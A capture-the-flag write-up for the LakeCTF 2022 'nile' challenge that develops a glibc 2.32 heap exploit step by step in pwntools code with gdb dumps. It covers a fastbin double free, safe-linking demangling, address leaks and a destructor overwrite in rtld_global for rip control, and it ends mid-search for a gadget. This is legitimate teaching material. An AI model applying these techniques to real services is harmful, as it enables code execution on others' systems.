LakeCTF Qualifications 2022 - nile

When I wrote this challenge, glibc 2.32 was the latest and greatest, so I made sure I could exploit this on 2.27, 2.29, 2.31 and 2.32. I only expect you to do the 2.32 version ;)

nc chall.polygl0ts.ch 3800

Team: Super Guesser

Attachment: nile libc-2.32.so Dockerfile ld-2.32.so xpl.py

Welcome to Nile, the newest and most advanced publishing and selling platform known to mankind.
Would you like to:
        1. Add a fake endorsement
        2. Add a brief description
        3. Review your current entries
        4. Remove some data
        5. Upgrade your plan
        6. quit

>

nile was kind of your regular heap note challenge, where you can add, view and free chunks. But it had some twists, which made it quite hard to exploit.

With adding a fake endorsement we can add 0x30 chunks and adding descriptions will create 0x50 chunks. All chunks are allocated via calloc, so tcache cannot be abused, because calloc will not serve chunks from tcache. So the easy path via tcache poisoning is not feasible :(

Also, since the challenge is using libc-2.32, we have to keep in mind, that we cannot directly use double frees, since tcache will check for that. But we can get around this, by first freeing 7 chunks regularly into tcache. After tcache is filled, the following frees will be handled in main_arena, which enables us to use double free again.

With this, we can start leaking heap values (again, libc-2.32 is used, so heap addresses will be mangled).

def exploit(r):
    r.recvuntil("> ")

    # create initial chunks
    for i in range(12): 
        adddesc(0x20-8, "A"*(0x20-8))
    
    # fillup tcache 
    for i in range(7):  
        remove(i)

    # upgrade to be able to allocate more chunks
    upgrade()
    
    # double free first chunk
    remove(0)
    remove(1)
    remove(0)

    # add a new chunk (0 and 11 will now point to the same chunk)
    adddesc(0x20-8, "A")    # 11

    # free chunk 0
    remove(0)

    # leak heap value from chunk 11 (which is now freed)
    LEAK = u64(review()[:-1].ljust(8, "\x00"))

    log.info("LEAK       : %s" % hex(LEAK))

One thing to note for this… When developing the exploit locally with ASLR disabled, the leak will look wrong.

$ python xpl.py
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 53115
[53115]
[*] Paused (press any to continue)
[*] LEAK       : 0x835d

This happens, because the mangled heap address will contain null bytes.

0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000835d	0x0000000000000000 <= mangled ptr
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051

Though with ASLR enabled, it will not contain any null bytes most of the time and can just be read this way.

kileak@beast:~/ctf/lake/nilework$ python xpl.py 
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 53219
[53219]
[*] Paused (press any to continue)
[*] LEAK       : 0x55681185831f

But while developing the exploit, we don’t want to activate ASLR, so, since we know that the leak will work correctly remote, we can just add a small fix to let our exploit also work locally with ASLR deactivated.

# leak heap value from chunk 11 (which is now freed)
with open("/proc/sys/kernel/randomize_va_space", "r") as f:
  state = f.read()[0]

print(hexdump(state))
ASLR = state == "2"

if LOCAL and not ASLR:      
  LEAK = 0x000055500000835d # 0x000055500000811d
else:
  LEAK = u64(review()[:-1].ljust(8, "\x00"))

log.info("LEAK       : %s" % hex(LEAK))

So, when we’re running locally and ASLR is disabled, we just set the value, it “should” be and from here on, we can debug it with and without ASLR the same.

$ python xpl.py 
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 54387
[54387]
[*] Paused (press any to continue)
[*] LEAK       : 0x55500000835d

This will give us a mangled heap pointer, which can luckily be reversed to get to the real heap address.

def demangle(obfus_ptr):
    o2 = (obfus_ptr >> 12) ^ obfus_ptr
    return (o2 >> 24) ^ o2

...

HEAP = demangle(LEAK)
$ python xpl.py 
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './nile': pid 54785
[54785]
[*] Paused (press any to continue)
[*] LEAK       : 0x55500000835d
[*] HEAP       : 0x55555555d600

This wasn’t too hard, but from here the real pain began (also not having a debug version of libc/ld at hand didn’t make it any better).

We have a double free, but since it’s handled via calloc, the chunks have to be 16 byte aligned and they need to have a correct size (0x50 or 0x30), so we cannot just allocate anywhere…

But let’s start with the obvious things first. We need a libc leak.

For this, it would be useful to free a chunk, that will not be handled as a fastbin, but we can only create 0x30 and 0x50 chunks… Except, when doing an upgrade: This will allocate a 0xc00 chunk on the heap, in which the chunks of the professional plan will be stored.

If we could free this chunk, we would get some main_arena pointers onto the heap, which we might be able to leak afterwards, so let’s start with that.

While preparing the previous heap leak, I also triggered the upgrade functionality. This was done on purpose, since after the leak, we still have a double freed pointer in main_arena and also already having allocated the 0xc00 chunk for the professional plan on the heap.

main_arena

0x7ffff7fc19f0:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x000055555555d5b0 <= 0x50 free chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a60:	0x000055555555e260	0x0000000000000000
0x7ffff7fc1a70:	0x00007ffff7fc1a60	0x00007ffff7fc1a60
0x7ffff7fc1a80:	0x00007ffff7fc1a70	0x00007ffff7fc1a70

gef➤  x/30gx 0x000055555555d5b0
0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000835d	0x0000000000000000
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000

0x000055500000835d ^ 0x55555555d = 0x55555555d600

gef➤  x/30gx 0x000055555555d600
0x55555555d600:	0x0000000000000000	0x0000000000000051
0x55555555d610:	0x00005550000080ed	0x4141414141414141
0x55555555d620:	0x4141414141414141	0x0000000000000000
0x55555555d630:	0x0000000000000000	0x0000000000000000
0x55555555d640:	0x0000000000000000	0x0000000000000000
0x55555555d650:	0x0000000000000000	0x0000000000000c11  <= insert fake chunk here
0x55555555d660:	0x000055555555d5c0	0x0000000000000040  <= pro plan chunk
0x55555555d670:	0x0000000000000000	0x0000000000000000

0x00005550000080ed ^ 0x55555555d = 0x55555555d5b0

We’ll use the next allocation to overwrite the FD pointer of the first chunk with a pointer pointing to the pro_plan chunk.

After that we’ll allocate the next chunk (which is directly above the pro plan chunk) and now put a valid chunk size above the pro_plan chunk.

The next allocation will then get our fake chunk on top of the pro plan, and since we put a valid chunk size there, it should succeed.

GUARD = HEAP >> 12

log.info("HEAP guard : %s" % hex(GUARD))

# overwrite FD of double freed chunk with pointer above pro plan chunk
adddesc(0x20-8, p64(HEAP+0x40^GUARD))

# create size for fake 0x50 chunk before pro_plan chunk
payload = p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0)
payload += p64(0) + p64(0x51)[:1]

adddesc(len(payload), payload)

# get fake FD into main_arena
adddesc(0x20-8, "C"*(0x20-8))
adddesc(0x20-8, p64(HEAP+0x40^GUARD))

0x55555555d5b0:	0x0000000000000000	0x0000000000000051
0x55555555d5c0:	0x000055500000831d	0x0000000000000000 <= overwritten FD
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051

0x000055500000831d ^ 0x55555555d = 0x55555555d640 (points above pro plan chunk)

adddesc(len(payload), payload)

0x55555555d600:	0x0000000000000000	0x0000000000000051
0x55555555d610:	0x0000000000000000	0x0000000000000000
0x55555555d620:	0x0000000000000000	0x0000000000000000
0x55555555d630:	0x0000000000000000	0x0000000000000000
0x55555555d640:	0x0000000000000000	0x0000000000000051 <= fake chunk size
0x55555555d650:	0x0000000000000000	0x0000000000000c11
0x55555555d660:	0x000055555555d5c0	0x0000000000000040

adddesc(0x20-8, "C"*(0x20-8))

0x7ffff7fc19f0:	0x0000000000000000	0x0000000000000000 <= main_arena
0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x000055555555d640 <= PTR to our fake chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000

The next 0x50 allocation will thus serve our fake chunk, with which we can overwrite the first bytes from the pro_plan chunk.

# allocate fake chunk and overwrite pro_plan chunk
payload = p64(0) + p64(0xc11)
payload += p64(HEAP+0x60) + p64(0x40)   # chunk ptr / size
payload += p64(0x0) + p64(HEAP+0x60)    # is_freed / chunk_ptr
payload += p64(0x40)                    # size

adddesc(len(payload), payload)

This will put a pointer to the pro_plan itself into the first pro chunk slot, which we could now free to get a free bin on the heap, but this will trigger malloc_consolidate, which will notice, that our chunks are totally messed up and abort.

malloc_consolidate(): unaligned fastbin chunk detected

But luckily, we can get around this, by creating a dummy endorsement, which will fix this for us.

# create endorsement to avoid crash in malloc_consolidate
addfake(0x20-8, "A")

# free pro_plan chunk (free unsorted bin now)
remove(3)
0x55555555d640:	0x0000000000000000	0x0000000000000051
0x55555555d650:	0x0000000000000000	0x0000000000000c11
0x55555555d660:	0x00007ffff7fc1a60	0x00007ffff7fc1a60
0x55555555d670:	0x0000000000000000	0x0000000000000000
0x55555555d680:	0x0000000000000000	0x0000000000000001
0x55555555d690:	0x0000000000000000	0x0000000000000040
0x55555555d6a0:	0x0000000000000000	0x000055555555d5c0
0x55555555d6b0:	0x0000000000000040	0x0000000000000000
0x55555555d6c0:	0x000055555555d650	0x0000000000000040
0x55555555d6d0:	0x0000000000000000	0x000055555555e270
0x55555555d6e0:	0x0000000000000020	0x0000000000000000

Ok, so finally some libc pointers on the heap, now we’ll just need to get them “reviewable”. We have to keep in mind, that any allocation will now be served from the freed bin, thus overwriting the pro plan entries itself and also move the libc addresses down the heap.

# allocate chunks pointing to freed unsorted bin address (so they can be reviewed)
payload = p64(HEAP+0x120) + p64(0x0)
payload += p64(0) 

addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)
addfake(len(payload), payload)

Allocating 4 0x30 chunks in the unsorted bin with pointers to where the main_arena pointers will be after those allocation will result in a valid pro_plan.

0x55555555d650:	0x0000000000000000	0x0000000000000031
0x55555555d660:	0x000055555555d720	0x0000000000000000 <= slot 1 buffer / slot 1 size
0x55555555d670:	0x0000000000000000	0x0000000000000000 <= slot 1 freed  / slot 2 buffer
0x55555555d680:	0x0000000000000000	0x0000000000000031 <= slot 2 size   / slot 2 freed
0x55555555d690:	0x000055555555d720	0x0000000000000000 <= slot 3 buffer / slot 3 size
0x55555555d6a0:	0x0000000000000000	0x0000000000000000 <= slot 3 freed  / slot 4 buffer
0x55555555d6b0:	0x0000000000000000	0x0000000000000031 <= slot 4 size   / slot 4 freed
0x55555555d6c0:	0x000055555555d720	0x0000000000000000 <= slot 5 buffer / slot 5 size
0x55555555d6d0:	0x0000000000000000	0x0000000000000000 <= slot 5 freed  / slot 6 buffer
0x55555555d6e0:	0x0000000000000000	0x0000000000000031 <= slot 6 size   / slot 6 freed
0x55555555d6f0:	0x000055555555d720	0x0000000000000000 <= slot 7 buffer / slot 7 size
0x55555555d700:	0x0000000000000000	0x0000000000000000 <= slot 7 freed
0x55555555d710:	0x0000000000000000	0x0000000000000b51
0x55555555d720:	0x00007ffff7fc1a60	0x00007ffff7fc1a60 <= main_arena pointers

Though every second slot has an invalid buffer, this is not an issue anymore, since the IsFree part of it contains 0x31, so it will be skipped in review (as it will interpret those as freed notes) and we can just leak the other slots with valid pointers.

# leak main arena ptr from review
LEAK = u64(review()[:6].ljust(8, "\x00"))
libc.address = LEAK - 0x1c2a60

log.info("LIBC leak    : %s" % hex(LEAK))
log.info("LIBC         : %s" % hex(libc.address))
[*] LIBC leak    : 0x7ffff7fc1a60
[*] LIBC         : 0x7ffff7dff000

Now, how to get rip control from here on?

First, I checked, if there were any valid chunk sizes (16 byte-aligned) in libc or ld, which could help us to overwrite something useful (I was already thinking in the direction of rtld_global there, since with aligned chunks, I didn’t see any feasible way to overwrite malloc_hook or free_hook).

But no chance, didn’t find any region, which contained a value, with which we could allocate a 0x50 or 0x30 chunk.

So, after a lot of failed tries, I checked bss to see, if we could somehow do something there.

0x555555558000 <free@got.plt>:       0x00007ffff7e8b2f0	0x0000555555555046
0x555555558010 <puts@got.plt>:       0x00007ffff7e76380	0x0000555555555066
0x555555558020 <printf@got.plt>:     0x00007ffff7e57b10	0x00007ffff7eefeb0
0x555555558030 <calloc@got.plt>:     0x00007ffff7e8ba50	0x00007ffff7e7c5e0
0x555555558040 <setvbuf@got.plt>:    0x00007ffff7e76aa0	0x00007ffff7e58f60
0x555555558050:                      0x0000000000000000	0x0000555555558058
0x555555558060 <stdout@GLIBC_2.2.5>: 0x00007ffff7fc2520	0x0000000000000000
0x555555558070 <stdin@GLIBC_2.2.5>:  0x00007ffff7fc1800	0x0000000000000000
0x555555558080 <stderr@GLIBC_2.2.5>: 0x00007ffff7fc2440	0x0000000000000000
0x555555558090:                      0x0000000000000000	0x0000000000000000
0x5555555580a0 <free_plan>:          0x0000000000000002	0x0000000000000002
0x5555555580b0 <free_plan+16>:       0x00005555555581d0	0x0000000000000000
0x5555555580c0 <pro_plan>:           0x0000000000000080	0x000000000000000a <= max pro bound / current pro count
0x5555555580d0 <pro_plan+16>:        0x000055555555d660	0x0000000000000000 <= pro plan chunk 
0x5555555580e0 <free_plan_data>:     0x000055555555d2a0	0x0000000000000000

Also no good chunk sizes there, to for example attack got table… But, can we create a fake chunk anywhere in bss?

Well, we kind of control the current pro count by adding more chunks, so we could create a valid chunk size there, and allocate a chunk overlapping the pointer to the pro_plan itself.

This will not allow us to “directly” write data anywhere, but we could let it point to a table structure (like dtors). Creating chunks then in the pro plan, could potentially overwrite a table entry with a heap chunk, from which _dl_fini would then fetch the function to execute, which could lead to rip control.

But, this would also mean, that we need to be able to do a clean exit, since the challenge will call cleanup before exitting, which will try to free all currently allocated chunks (which will most likely fail, after the whole mess we created by now on the heap).

We’ll also need to find a way around that, but let’s keep that for later.

First we’ll need a leak to elf region:

# overwrite an allocated chunk with pointer to pie address
payload = p64(libc.address+0x1c1d80) + p64(0x0)
payload += p64(0) + p64(0x51)[:1]                 # fix chunksize

addfake(len(payload), payload)

# leak pie address from review
PIE = u64(review().split("\n")[4].ljust(8, "\x00"))
	
log.info("PIE          : %s" % hex(PIE))

This will create another entry in our freed pro plan, with its buffer pointing to a libc address, that contains a pointer to our elf.

But at the current state, the heap is such a mess, that almost every allocation will go haywire. Thus we also need to put a valid chunksize in our payload to fix the followup fastbin. Otherwise malloc will notice the invalid fastbin and crash.

Allocations and frees really start to get a pain from here on…

[*] PIE          : 0x555555558080

With this, we were successful on leaking an address pointing to bss, so we can now prepare putting a fake chunk there.

But trying to use the double free to allocate a chunk onto bss now, triggered again malloc_consolidate and it checked the unsorted bin on the heap, which… well… wasn’t linked correctly anymore, since we were overwriting it with pro plan chunks.

So, let’s first take a detour to repair this…

# double free
remove(0)
remove(1)
remove(0)
	
# point fd to unsorted bin
adddesc(0x10, p64((HEAP+0x130)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))

# fix unsorted bin pointers
payload = p64(0) + p64(0x21)
payload += p64(libc.address+0x1c2a60) + p64(libc.address+0x1c2a60)
payload += p64(0x20) + p64(0x20)

adddesc(len(payload), payload)

We use the double free again to allocate a fake chunk overlapping the bin, and then with the last allocation overwrite the size of the bin with 0x20 and putting valid main_arena pointers into it. By resizing it, we won’t have to bother with it anymore, since we’ll never do an allocation that could fit into a 0x20 bin, so hopefully, we’re good now.

Now, we can go on with allocating into bss, by first increasing the pro plan counter, so that when our final allocation happens, we’ll have a 0x50 size in it.

# increase pro plan counter
for i in range(61):
    addfake(10, "A")
    
# double free
remove(0)
remove(1)
remove(0)

# overwrite FD with pointer to pro_plan address
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef))
adddesc(0x10, p64(0xdeadbeef))
bss

0x5555555580b0 <free_plan+16>:   0x00005555555581d0	0x0000000000000000
0x5555555580c0 <pro_plan>:       0x0000000000000080	0x000000000000004f <= pro plan counter
0x5555555580d0 <pro_plan+16>:    0x000055555555d660	0x0000000000000000
0x5555555580e0 <free_plan_data>: 0x000055555555d2a0	0x0000000000000000

main_arena

0x7ffff7fc1a00:	0x0000000000000000	0x0000000000000001
0x7ffff7fc1a10:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a20:	0x0000000000000000	0x00005555555580c0 <= 0x50 fastbin pointing to pro_plan chunk
0x7ffff7fc1a30:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a40:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a50:	0x0000000000000000	0x0000000000000000
0x7ffff7fc1a60:	0x000055555555ee00	0x000055555555d740

Looking good. The next allocation will increase the pro plan counter to 0x50 and then allocate the next chunk at 0x00005555555580c0, which will succeed, since we have a valid chunk size there now.

So, with the next chunk, we’ll be able to overwrite the pro_plan pointer itself. Keep in mind, that we’ll not be able to write arbitrary data there, but we’ll overwrite the target region with pointers to our heap chunks. That’s why I went for rtld_global.

After some experimentation (aka debugging the hell out of _dlfini), the following region looked good

0x7ffff7ffe1d0:	0x0000000000000000	0x00007ffff7ffe728
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555c010
0x7ffff7ffe1f0:	0x000055555555c0f0	0x000055555555c0e0
0x7ffff7ffe200:	0x0000000000000000	0x000055555555c090
0x7ffff7ffe210:	0x000055555555c0a0	0x000055555555c120
0x7ffff7ffe220:	0x000055555555c130	0x000055555555c140
0x7ffff7ffe230:	0x000055555555c0b0	0x000055555555c0c0
0x7ffff7ffe240:	0x000055555555c020	0x000055555555c030

We have to keep in mind, that we have already allocated 0x50 chunks, so when overwriting the pro_plan counter, we want to point it to dest_address-(0x50*0x18), so that the next allocations will be written to dest_address.

We’ll first start putting some placeholder chunks there, which will be needed later (this is the result from hours of fiddling around in ld, so it’s a bit hard to explain in the right order, but should become clearer later on)

if LOCAL and not ASLR:
  LD = libc.address + 0x1d1000
else:
  LD = libc.address + 0x1cb000

RTLD = LD + 0x2e1d0
TARGET = RTLD-(0x50*24)

log.info("TARGET CHUNK : %s" % hex(RTLD))

# overwrite pro_plan address with address in rtld_global
payload = p64(TARGET)

adddesc(len(payload), payload)

addfake(20, "X"*19)
addfake(20, "Y"*19)

# put a gadget placeholder here for later
payload = "Z"*8 + p64(0xdeadbeef)

addfake(20, payload)
gef➤  x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0:	0x000055555555ee10	0x0000000000000020 chunk    / size
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555ee40 is_freed / chunk
0x7ffff7ffe1f0:	0x0000000000000020	0x0000000000000000 size     / is_freed
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020 chunk    / size
0x7ffff7ffe210:	0x0000000000000000	0x000055555555c120 is_freed
0x7ffff7ffe220:	0x000055555555c130	0x000055555555c140
0x7ffff7ffe230:	0x000055555555c0b0	0x000055555555c0c0

If we could exit now (getting through cleanup without a crash), this would just exit cleanly, since we don’t have overwritten any dtors by now. This was just to prepare some placeholders, which we’ll need later to be able to cleanly call one_gadget.

With the next allocations, we’ll overwrite a dtor pointer, which will be called later on, but we now have to also think about, how we can survice cleanup in order to arrive at _dl_fini at all.

# double free
remove(0)
remove(1)
remove(0)

CALL = 0xfacebabe
	
# overwrite free fd with ptr to pro plan again
adddesc(0x10, p64((PIE+0x40)^GUARD))
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))
adddesc(0x10, p64(0xdeadbeef)+p64(CALL))        # overwrite dtor entry
addfake(20, "A")

We again trigger a double free, so that we can control, where next allocations will go to. We then overwrite the FD of the doubly freed chunk with a pointer to pro_plan again. Then we’ll allocate a dummy chunk to pull in our fake fd into main_arena.

The last description will now overwrite a dtor pointer in rtld_global with 0xfacebabe, which could lead to code execution, if we make it there.

gef➤  x/30gx 0x7ffff7ffe1d0
0x7ffff7ffe1d0:	0x000055555555ee10	0x0000000000000020
0x7ffff7ffe1e0:	0x0000000000000000	0x000055555555ee40
0x7ffff7ffe1f0:	0x0000000000000020	0x0000000000000000
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020
0x7ffff7ffe210:	0x0000000000000000	0x000055555555d5c0
0x7ffff7ffe220:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe230:	0x000055555555d610	0x0000000000000040
0x7ffff7ffe240:	0x0000000000000000	0x000055555555d5c0 <= fake dtor chunk
0x7ffff7ffe250:	0x0000000000000040	0x0000000000000000
0x7ffff7ffe260:	0x000055555555eea0	0x0000000000000020

gef➤  x/30gx 0x000055555555d5c0
0x55555555d5c0:	0x00000000deadbeef	0x00000000facebabe <= dtor entry
0x55555555d5d0:	0x0000000000000000	0x0000000000000000
0x55555555d5e0:	0x0000000000000000	0x0000000000000000
0x55555555d5f0:	0x0000000000000000	0x0000000000000000
0x55555555d600:	0x0000000000000000	0x0000000000000051

The next allocation, will again overwrite the pro_plan pointer, since we already placed a FD pointing there in main_arena.

We’ll now let it point directly above itself (subtracting the appropriate offset of already allocated chunks again).

# overwrite pro_plan with address above pro plan to overwrite allocated chunk count (to make free work)
TARGET = (PIE+0x38)-(0x58*24)
payload = p64(TARGET)

adddesc(len(payload), payload)
0x5555555580a0 <free_plan>:    0x0000000000000002	0x0000000000000002
0x5555555580b0 <free_plan+16>: 0x00005555555581d0	0x0000000000000000 <= next allocation will be stored here
0x5555555580c0 <pro_plan>:     0x0000000000000080	0x0000000000000058 
0x5555555580d0 <pro_plan+16>:  0x0000555555557878	0x0000000000000000

By doing this, the next chunk allocation will write the buffer address to 0x5555555580b8, its size to 0x5555555580c0 and it’s is_freed value to 0x5555555580c0 (which happens to be the pro_plan counter).

This will effectively set the pro_plan_counter to 0. Exactly what we need to fix cleanup.

ONE_GADGET = libc.address + 0xcda5d

payload = "B"*0x10
payload += p64(ONE_GADGET)

addfake(31, payload)
0x5555555580b0 <free_plan+16>: 0x00005555555581d0	0x000055555555eed0
0x5555555580c0 <pro_plan>:     0x0000000000000020	0x0000000000000000 <= pro_plan_counter 0
0x5555555580d0 <pro_plan+16>:  0x0000555555557878	0x0000000000000000

Finally, time to exit and trigger our chain (and to fix it up).

Since, cleanup is now executed nice and clean, we’ll end up in dl_fini, running into our fake dtors there.

$rax   : 0x000055555555d5c0  →  0x00000000deadbeef
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7fe16a4  →  0xff07034908408b48
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7fe1698                  mov    rax, QWORD PTR [r15+0xa8]
   0x7ffff7fe169f                  test   rax, rax
   0x7ffff7fe16a2                  je     0x7ffff7fe16ad
●→ 0x7ffff7fe16a4                  mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7fe16a8                  add    rax, QWORD PTR [r15]
   0x7ffff7fe16ab                  call   rax
   0x7ffff7fe16ad                  mov    esi, DWORD PTR [rbp-0x3c]
   0x7ffff7fe16b0                  test   esi, esi
   0x7ffff7fe16b2                  jne    0x7ffff7fe16c2
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0  →  [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0  →  0x00007fffffffdaa0  →  [loop detected]

This will now fetch the value from rax+0x8 and add the value at r15 (0x0000555555554000, which is elf base) to it, and then call it.

We previously put 0xfacebabe there, so this would now call 0x55565023fabe. Not quite right, so let’s go back there and fix that value.

CALL = 0x7ffffacebabe

# overwrite free fd with ptr to pro plan again	
adddesc(0x10, p64((PIE+0x40)^GUARD))	
adddesc(0x10, p64(0xdeadbeef)+p64(0xcafebabe))	
adddesc(0x10, p64(0xdeadbeef)+p64(CALL-(PIE-0x4080)))
$rax   : 0x7ffffacebabe    
$rbx   : 0x00007ffff7ffd000  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rcx   : 0x0               
$rdx   : 0x0000555555557dd8  →  0x0000555555555170  →  <__do_global_dtors_aux+0> endbr64 
$rsp   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$rbp   : 0x00007fffffffdaf0  →  0x0000000000000000
$rsi   : 0x0               
$rdi   : 0x0000555555558060  →  0x00007ffff7fc2520  →  0x00000000fbad2887
$rip   : 0x00007ffff7fe16ab  →  0x75f685c4758bd0ff
$r8    : 0x2               
$r9    : 0x1               
$r10   : 0x00007ffff7f73ac0  →  0x0000000100000000
$r11   : 0x246             
$r12   : 0x0               
$r13   : 0x00007fffffffda80  →  0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$r14   : 0x0000555555557dd0  →  0x00005555555551c0  →  <frame_dummy+0> endbr64 
$r15   : 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7fe16a2                  je     0x7ffff7fe16ad
●  0x7ffff7fe16a4                  mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7fe16a8                  add    rax, QWORD PTR [r15]
 → 0x7ffff7fe16ab                  call   rax
   0x7ffff7fe16ad                  mov    esi, DWORD PTR [rbp-0x3c]
   0x7ffff7fe16b0                  test   esi, esi
   0x7ffff7fe16b2                  jne    0x7ffff7fe16c2
   0x7ffff7fe16b4                  mov    ecx, DWORD PTR [rip+0x1b046]        # 0x7ffff7ffc700
   0x7ffff7fe16ba                  test   ecx, ecx
─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda80│+0x0000: 0x00007ffff7ffe1a0  →  0x0000555555554000  →  0x00010102464c457f	 ← $rsp, $r13
0x00007fffffffda88│+0x0008: 0x00007ffff7ffe750  →  0x00007ffff7fce000  →  0x00010102464c457f
0x00007fffffffda90│+0x0010: 0x00007ffff7fc8000  →  0x00007ffff7dff000  →  0x03010102464c457f
0x00007fffffffda98│+0x0018: 0x00007ffff7ffda08  →  0x00007ffff7fd0000  →  0x00010102464c457f
0x00007fffffffdaa0│+0x0020: 0x00007fffffffdaa0  →  [loop detected]
0x00007fffffffdaa8│+0x0028: 0x00007fffffffdaa0  →  0x00007fffffffdaa0  →  [loop detected]

Calling 0x7ffffacebabe… Seems, we have rip control, yay…

But wait… None of the one_gadget constraints can be fullfilled, and also none of the registers point anywhere useful to maybe do some stack pivoting =(

0xcda5d execve("/bin/sh", r12, rdx)
constraints:
  [r12] == NULL || r12 == NULL
  [rdx] == NULL || rdx == NULL

This would have been a good candidate, since r12 is already 0x0, but rdx contains an address, thus we cannot use it (for now…).

Well, this took quite some time to come up with a solution for, but after wading through countless gadgets to make anything useful from the situation, I came up with this:

0x7ffff7f2cd44:	mov    rax,QWORD PTR [r15+0x60]
0x7ffff7f2cd48:	call   QWORD PTR [rax+0x8]

$r15 is pointing to the ld region, we overwrote with our pro plan chunks.

gef➤  x/10gx 0x00007ffff7ffe1a0+0x60
0x7ffff7ffe200:	0x000055555555ee70	0x0000000000000020
0x7ffff7ffe210:	0x0000000000000000	0x000055555555d5c0
